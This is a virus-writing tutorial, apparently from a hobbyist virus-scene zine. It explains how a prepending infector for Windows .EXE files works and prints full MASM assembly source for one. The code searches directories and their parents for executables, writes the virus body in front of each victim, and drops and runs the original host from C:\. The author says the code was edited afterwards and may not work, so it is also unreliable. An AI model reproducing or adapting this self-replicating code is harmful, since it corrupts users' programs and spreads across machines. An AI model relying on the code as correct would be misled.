Infecting .EXE by prepending
                                                    ---simple method----
                                                  berniee/fakedminded

.Introduction: Prepending method of infection to some extent considered lame,but yet still
it does its work.I will explain in this peace of shit this kinda method,and
from the beginning sorry for my english because it sux!btw the following is for educational purposes only if you commit blah,blah....etc

.Prepending How to?
prepending Infection by definition is adding your virus body which is the
compiled/assembled .exe to the begining of the victim excutable file
and the old victime one will be on the end .So it simply doesnt mess up
with excutable headers.

.Getting started
to build a prepender virii,you dont have to learn assembly,you can do it with any other
programming languages,but with assembly you can do alot of stuff if you know
what you are doing.So,
lets put some steps inorder  to code the virus:
-you must find a victim file
-map your own virus (from current running process),and open the victims file that we have found on search
-put the virus in the beginning and the v. to the end
-drop and execute the old v. if found (not in first generation)
-wait for dropped file to end so as to delete it.

.Getting deeper 

see the following commented kode:

;------------------cut from here

.586
.model flat,stdcall
option casemap:none

include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc

includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib

;------------------------the above was just includes and libraries you need in assembling the following
vir_size = 4096       ;any modification please replace thiZ Value (try using merging )

.data          ;----needed data
mark db "das ist zu kalt!",0 
ext db "*.exe",0
up_one db "..",0


.data?
wf32 WIN32_FIND_DATA<?>
fhandle dd ?
buffer db 512 dup (?)
buffer_directory1 db 256 dup (?)
buffer_directory2 db 256 dup (?)
buffer_inf db 512 dup (?)
delta_handle dd ?


.code

;----beginning of needed procedures

;----well, about infecting procedure;it is simple
;----I avoided infecting win directory files
;----In this infecting method we just need to allocate a memory
;----with size =v_size+vir_size;and we put virus body first
;----then we put victim body next
;----we started to open our virus file and copy its junk to the memory then we close file
;----then we open the victim file for writing ;but we first read it to memory
;----next we write our virus first (with size=vir_size);then we put victim data at the end



;///////////////////////infect procedure
 

infect proc
mov eax,offset wf32.cFileName
add eax,3
cmp word ptr [eax],"NIW"
je exit_inf
cmp word ptr [eax],"niw"
je exit_inf
invoke GetModuleFileName,0,offset buffer_inf,256

invoke CreateFile,offset buffer_inf,80000000h,0,0,3,0,0
or eax,eax
jz exit_inf .data?

cfile_handle dd ?
cfile_size dd ?
cmemory dd ?
bwr dd ?


.code
mov cfile_handle,eax
invoke GetFileSize,cfile_handle,0
cmp eax,0
je exit_inf
mov cfile_size,eax
invoke GlobalAlloc,0,eax
mov cmemory,eax
cmp eax,0
je exit_inf
invoke ReadFile,cfile_handle,cmemory,cfile_size,offset bwr,0
cmp eax,0
je exit_inf

invoke CloseHandle,cfile_handle
mov edx,cmemory
cmp word ptr [edx+vir_size],'ZM'
je exit_inf

invoke SetFileAttributes,FILE_ATTRIBUTE_ARCHIVE


invoke CreateFile,offset wf32.cFileName,40000000h or 80000000h,0,0,3,0,0
or eax,eax
jz exit_inf
.data?
inf_fHandle dd ?
inf_fSize dd ?
inf_mem dd ?


.code
mov inf_fHandle ,eax

invoke GetFileSize,inf_fHandle,0
or eax,eax
jz exit_inf

mov inf_fSize,eax

invoke GlobalAlloc,0,inf_fSize
or eax,eax
jz exit_inf
mov inf_mem,eax

invoke ReadFile,inf_fHandle,inf_mem,inf_fSize,offset bwr,0
or eax,eax
jz exit_inf

invoke SetFilePointer,inf_fHandle,FILE_BEGIN,0,0
invoke WriteFile,inf_fHandle,cmemory,vir_size,offset bwr,0
invoke WriteFile,inf_fHandle,inf_mem,inf_fSize,offset bwr,0
invoke WriteFile,inf_fHandle,offset mark,sizeof mark,offset bwr,0

invoke CloseHandle,inf_fHandle


exit_inf :
ret
infect endp
;//////////////////////end of infect procedure

;----drop old funcion which have been called when we have been checking
;----if there is an old victim in our virus ass
;----it works by making same file name in temp direcetory which was 'c:\' :/
;----we get pointer to our old victim and just write to our temp filename
;----we create old victim in new process
;----then problem is that we had to delete the old_victim after it completes
;----its running...well I used WaitForSingleObject api that it checks
;----if the object(our process) still running and returns when it has finished
;----we set the time of this api to -1(infinite)
;----then we call del_tracks procedure which will start a loop
;----trying to delete the temp file(old victim)
;////////////////drop old victim procedure
 

drop_old proc
invoke GetModuleFileName,0,offset buffer_inf,256

.data
tempdir db "c:\",0

.data?
stinfo STARTUPINFOA<?>
prinfo PROCESS_INFORMATION <?>
.code

mov esi,offset buffer_inf
add esi,256

loop_slash:
dec esi
cmp byte ptr [esi],'\'
jne loop_slash
inc esi
invoke SetCurrentDirectory,offset tempdir
invoke CreateFile,esi,40000000h,0,0,2,2h,0
mov delta_handle,eax
mov eax,cmemory
add eax,vir_size
sub cfile_size,vir_size
invoke WriteFile,delta_handle,eax,cfile_size,offset bwr,0
invoke CloseHandle,delta_handle

invoke GetStartupInfo,offset stinfo
invoke CreateProcess,esi,0,0,0,0,CREATE_NEW_CONSOLE,0,0,offset stinfo,offset prinfo

invoke WaitForSingleObject,prinfo.hThread,-1

call del_tracks


invoke MessageBox,0,esi,esi,0
ret
drop_old endp
;//////////////////end of drop old victim procedure

;----the following procedure is the delete tracks which will delete the temporary formed victim file
;///////////////////delete track procedure


del_tracks proc

loop_7:

invoke DeleteFile,esi
cmp eax,0
je loop_7
ret
del_tracks endp
;//////////////////end of delete tracks procedure
 

;////////////start of our program
start:


;---from here you can see that I started searching for victim files
;---I used FindFirstFile and FindNextFile apis
;---and each file found I call for file infection routine
infectious:
invoke FindFirstFile,offset ext,offset wf32
mov fhandle,eax
call infect


loop_1: ;beginning search files l00p
invoke RtlZeroMemory ,offset buffer,512
invoke lstrcpy,offset buffer,offset wf32.cFileName
invoke FindNextFile,fhandle,offset wf32
invoke lstrcmp,offset buffer,offset wf32.cFileName
cmp eax,0
je exit_loop_1
call infect
jmp loop_1
exit_loop_1: ;exit the searching loop


;-----here you may notice that I set the current directory to '..'
;-----which means getting up one directory
;-----and inorder not put the cycle infinite
;-----we put buffer_directory_1(and 2) ro compare
;-----if our virus cannt go up anyfurhter so as he can exit
invoke GetCurrentDirectory,256,offset buffer_directory1
invoke SetCurrentDirectory,offset up_one
invoke GetCurrentDirectory,256,offset buffer_directory2
invoke lstrcmp,offset buffer_directory1,offset buffer_directory2
cmp eax,0
je exit_up
invoke CloseHandle,fhandle
jmp infectious

exit_up:

;------now we will check if we are carrying old victim
;------that needs to be extraces and excuted
;------if not just exit if yes we call for the dropper
mov edx,cmemory ;just cheking for old_attached_victim
cmp word ptr [edx+vir_size],'ZM'
je call_dropper
jmp a_5
call_dropper:
call drop_old
a_5:

exit_me:
invoke ExitProcess,0 ;end of the LamE storiE

end start
 


 

;---- end of cut

 

NOTE: I will not guarantee that the above code will work properly since I added/deleted some

      lines while writing this  shit..so I will be pleased if you dont commit copy pasting

      to run virii...just understand the thing and continue your life.